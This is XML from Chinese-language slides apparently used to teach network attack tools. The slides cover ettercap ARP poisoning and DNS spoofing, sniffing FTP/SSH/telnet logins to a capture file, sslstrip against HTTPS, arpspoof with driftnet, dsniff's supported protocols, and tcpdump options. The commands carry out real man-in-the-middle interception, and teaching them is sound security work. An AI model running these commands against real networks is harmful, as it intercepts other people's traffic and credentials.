              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> eth0 -M ARP // //   		            	  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>毒化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eth0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>所在的网段，安静模式文本显示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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tzq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> /10.0.0.1/21,22,23  -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hack.pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>         	  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>10.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ftp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 err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>并保存到本地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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dns_spoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> /192.168.1.120// //	  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>192.168.1.120</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>欺骗，使用默认网卡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eth0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文本模式安静显示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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tqi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> eth0 -L </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sniffed_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>filter.ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>arp:remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> /10.0.0.2/80 //     #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>使用过滤并监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>10.0.0.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口的所有通信，安静模式文本显示，保存数据到本地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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、拓展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ettercap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssltrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>进行攻击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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、使用插件修改数据包 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ettercap filter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32356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Ettercap filter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45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367631"/>
            <a:ext cx="8711939" cy="292023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90838" y="4546923"/>
            <a:ext cx="6096000" cy="17091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DATA.data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>数据包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ip.proto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> == TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>类型，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>UDP/TCP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tcp.dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> == 80 TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>端口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文件每行以分号结束</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141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Dsniff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46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50372" y="1264824"/>
            <a:ext cx="630600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Dsniff</a:t>
            </a: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目前支持以下协议</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FTP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Telnet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SMTP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HTTP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POP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 err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>poppass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NNTP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IMAP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SNMP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LDAP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Rlogin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RIP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OSPF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PPTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MS-CHAP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NFS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VRRP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YP/NIS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SOCKS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X11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CVS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IRC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AIM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ICQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Napster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PostgreSQL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Meeting Maker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Citrix ICA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Symantec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pcAnywhere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NAI Sniffer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 err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MicrosoftSMB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Oracle SQL*Net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Sybase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Microsoft SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty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结合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ettercap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ettercap -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dns_spoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -M </a:t>
            </a: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en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> //192.168.1.120/ //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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:~# driftnet -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> eth0</a:t>
            </a:r>
          </a:p>
          <a:p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结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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arpspoof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arpspoof -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> eth0 -t 192.168.1.1 192.168.1.12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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:~# driftnet -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> eth0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18094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tcpdump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47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933" y="1311048"/>
            <a:ext cx="7473863" cy="1442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主要功能：捕获和分析数据包。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TcpDump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>可以将网络中传送的数据包的“头”完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤，并提供 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>and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or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>等逻辑语句来帮助你去掉无用的信息。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命令格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcpdump [ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>选项 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>] [ -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>数量 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>] [ -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i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zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>网络接口 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>] [ -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>文件名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>] [ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>表达式 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331933" y="3404854"/>
            <a:ext cx="7035453" cy="3192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-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：使标准输出变为缓冲行形式；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-c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：抓包次数；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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：直接以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>及 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Port Number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>显示，而非主机名与服务名称；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-s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>数据包大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>设置每个数据包的大小；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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：指定监听的网络接口；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-r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：从指定的文件中读取包；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-w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：输出信息保存到指定文件；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-a</a:t>
            </a:r>
            <a:r>
